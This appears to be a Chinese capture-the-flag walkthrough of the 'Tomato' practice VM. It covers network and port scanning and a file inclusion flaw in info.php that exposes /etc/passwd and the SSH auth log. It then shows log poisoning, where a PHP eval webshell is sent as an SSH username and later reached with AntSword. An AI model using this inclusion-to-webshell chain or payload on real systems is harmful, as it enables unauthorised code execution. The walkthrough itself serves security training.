Tomato靶机攻略

将tomato改为NAT模式

扫描ip

arp-scan -l

扫描端口,发现ssh服务端口从22改为2211

扫描目录

发现http://192.168.31.134/antibot_image/ 访问

查看所有php文件的源码,看看有什么不同的地方

在info.php的源码中发现问题

在输入后,成功显示,说明文件包含漏洞

info.php?image=/etc/passwd

通过/var/log/auth.log这个在linux中使用的日志文件,成功查看到日志

info.php?image=/var/log/auth.log

使用ssh登录,看日志里会不会出现记录

发现日志中有记录

使用kali,让一句话木马写入日志中

ssh '<?php @eval($_POST[1]);?>'@192.168.31.134 -p 2211,

我的kali写入失败,选择用xshell连接

之后点击连接,当然肯定会失败,日志记录了就可以

使用中国蚁剑连接

相关推荐
火龙谷9 分钟前
【hadoop】master一键启动hadoop集群(高可用)
linux·hadoop
noravinsc23 分钟前
Linux 下 Module 工具的介绍与使用
linux·运维·服务器
爱上python的猴子27 分钟前
chrome中的copy xpath 与copy full xpath的区别
前端·chrome
川穹冬菱草40 分钟前
Ubuntu 20.04.6编译安装COMFAST CF-AX90无线网卡驱动
网络·编译安装·comfast cf-ax90·无线网卡驱动·linux网卡驱动·ubuntu网卡驱动·aic8800驱动
Sunlight_77743 分钟前
第五章 SQLite数据库:1、SQLite 基础语法及使用案例
java·linux·服务器·jvm·数据库·tcp/ip·sqlite
Silence4Allen1 小时前
Ubuntu 安装WPS Office
linux·ubuntu·wps
woodWu1 小时前
Android编译时动态插入代码原理与实践
android
Lysun0011 小时前
dispaly: inline-flex 和 display: flex 的区别
前端·javascript·css
程序员JerrySUN1 小时前
驱动开发硬核特训 · Day 11(下篇):从 virtio_blk 看虚拟总线驱动模型的真实落地
linux·驱动开发·嵌入式硬件
半兽先生1 小时前
CentOS 中安装 vim
linux·centos·vim